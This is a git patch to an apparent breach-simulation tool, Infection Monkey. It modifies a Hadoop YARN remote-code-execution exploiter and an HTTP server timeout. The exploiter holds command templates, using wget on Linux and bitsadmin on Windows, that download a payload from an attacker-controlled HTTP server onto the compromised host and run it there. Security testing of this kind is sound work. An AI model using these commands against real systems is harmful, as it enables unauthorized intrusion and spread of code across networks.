From 390d94a8c36216c86c2174a5a47471eaf13bcdc3 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 3 Aug 2018 18:28:02 +0300 Subject: [PATCH] Final tests, windows command changed --- infection_monkey/exploit/hadoop.py | 24 +++++++++++++----------- infection_monkey/transport/http.py | 2 +- 2 files changed, 14 insertions(+), 12 deletions(-) diff --git a/infection_monkey/exploit/hadoop.py b/infection_monkey/exploit/hadoop.py index 805f0f602..a5839697f 100644 --- a/infection_monkey/exploit/hadoop.py +++ b/infection_monkey/exploit/hadoop.py @@ -12,15 +12,15 @@ from exploit.web_rce import WebRCE from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth import posixpath from threading import Lock -from model import DROPPER_ARG, DOWNLOAD_TIMEOUT +from model import MONKEY_ARG __author__ = 'VakarisZ' LOG = logging.getLogger(__name__) + class HadoopExploiter(WebRCE): _TARGET_OS_TYPE = ['linux', 'windows'] - # TODO add more hadoop ports HADOOP_PORTS = [["8088", False]] # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes @@ -29,8 +29,10 @@ class HadoopExploiter(WebRCE): "&& wget -O %(monkey_path)s %(http_path)s " \ "; chmod +x %(monkey_path)s " \ "&& %(monkey_path)s %(monkey_type)s %(parameters)s" - WINDOWS_COMMAND = "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s " \ - "&& %(monkey_path)s %(monkey_type)s %(parameters)s" + WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \ + " Update /download /priority high %(http_path)s %(monkey_path)s " \ + "& %(monkey_path)s %(monkey_type)s %(parameters)s" + DOWNLOAD_TIMEOUT = 90 LOCK = Lock() def __init__(self, host): @@ -64,18 +66,17 @@ class HadoopExploiter(WebRCE): monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path) if 'linux' in self.host.os['type']: command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": http_path, - "monkey_type": DROPPER_ARG, "parameters": monkey_cmd} + "monkey_type": MONKEY_ARG, "parameters": monkey_cmd} else: command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": http_path, - "monkey_type": DROPPER_ARG, "parameters": monkey_cmd} - # command = "! [ -f %(monkey_path)s ] wget -O %(monkey_path)s %(http_path)s" % {"monkey_path": path, "http_path": http_path} + "monkey_type": MONKEY_ARG, "parameters": monkey_cmd} if not path: return False - if not self.exploit(url, command): + if not self.exploit(exploitable_url, command): return False self.LOCK.release() - http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() return True @@ -102,7 +103,8 @@ class HadoopExploiter(WebRCE): else: return False - def try_exploit(self, url): + @staticmethod + def try_exploit(url): # Get the newly created application id try: resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application")) @@ -111,4 +113,4 @@ class HadoopExploiter(WebRCE): if resp.status_code == 200: return True else: - return False \ No newline at end of file + return False diff --git a/infection_monkey/transport/http.py b/infection_monkey/transport/http.py index b65fda4e9..cae4842d0 100644 --- a/infection_monkey/transport/http.py +++ b/infection_monkey/transport/http.py @@ -179,7 +179,7 @@ class HTTPServer(threading.Thread): self._stopped = True - def stop(self, timeout=60): + def stop(self, timeout=5): self._stopped = True self.join(timeout)